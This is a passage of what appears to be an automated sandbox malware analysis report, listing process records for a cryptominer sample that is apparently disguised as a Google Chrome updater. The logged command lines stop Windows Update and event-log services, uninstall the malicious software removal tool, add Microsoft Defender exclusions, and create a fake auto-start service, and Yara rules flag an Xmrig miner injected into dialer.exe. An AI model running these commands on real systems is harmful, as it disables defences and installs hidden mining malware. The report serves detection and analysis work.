                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:16
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:17
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:18
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                    Imagebase:0x7ff67c300000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:19
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                    Imagebase:0x7ff67c300000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:20
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:21
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                    Imagebase:0x7ff67c300000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:22
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:23
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                    Imagebase:0x7ff67c300000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:24
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:25
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\dialer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\dialer.exe
                                                                    Imagebase:0x7ff7f57b0000
                                                                    File size:39'936 bytes
                                                                    MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:26
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:27
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:28
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:29
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:30
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:31
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\winlogon.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:winlogon.exe
                                                                    Imagebase:0x7ff7f7550000
                                                                    File size:906'240 bytes
                                                                    MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:32
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:33
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:34
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\lsass.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\lsass.exe
                                                                    Imagebase:0x7ff7bf4f0000
                                                                    File size:59'456 bytes
                                                                    MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:35
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:36
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:37
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\ProgramData\Google\Chrome\updater.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\ProgramData\Google\Chrome\updater.exe
                                                                    Imagebase:0x7ff7cbc80000
                                                                    File size:5'511'680 bytes
                                                                    MD5 hash:73A56908097EE57DD4217877AEAE4641
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 55%, ReversingLabs
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:38
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                    Imagebase:0x7ff760310000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:39
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:40
                                                                    Start time:06:24:30
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                    Imagebase:0x7ff77afe0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:41
                                                                    Start time:06:24:31
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\dwm.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"dwm.exe"
                                                                    Imagebase:0x7ff6f73e0000
                                                                    File size:94'720 bytes
                                                                    MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:42
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                    Imagebase:0x7ff652a00000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:43
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:44
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:45
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:46
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\wusa.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                    Imagebase:0x7ff7e7830000
                                                                    File size:345'088 bytes
                                                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:47
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:48
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:49
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:50
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:51
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe stop bits
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:52
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:53
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:54
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:55
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                    Imagebase:0x7ff67c300000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:56
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                    Imagebase:0x7ff67c300000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:57
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:58
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                    Imagebase:0x7ff67c300000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:59
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:60
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                    Imagebase:0x7ff67c300000
                                                                    File size:96'256 bytes
                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:61
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:62
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:63
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\dialer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\dialer.exe
                                                                    Imagebase:0x7ff7f57b0000
                                                                    File size:39'936 bytes
                                                                    MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:64
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\dialer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\dialer.exe
                                                                    Imagebase:0x7ff7f57b0000
                                                                    File size:39'936 bytes
                                                                    MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:65
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\dialer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:dialer.exe
                                                                    Imagebase:0x7ff7f57b0000
                                                                    File size:39'936 bytes
                                                                    MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000003.2002764308.000001E2F68E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000003.1931884309.000001E2F68E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000002.2575912282.000001E2F6861000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000002.2571106481.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000041.00000002.2571106481.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:66
                                                                    Start time:06:24:33
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                    Imagebase:0x7ff77afe0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:67
                                                                    Start time:06:24:33
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                    Imagebase:0x7ff77afe0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:68
                                                                    Start time:06:24:33
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                    Imagebase:0x7ff77afe0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
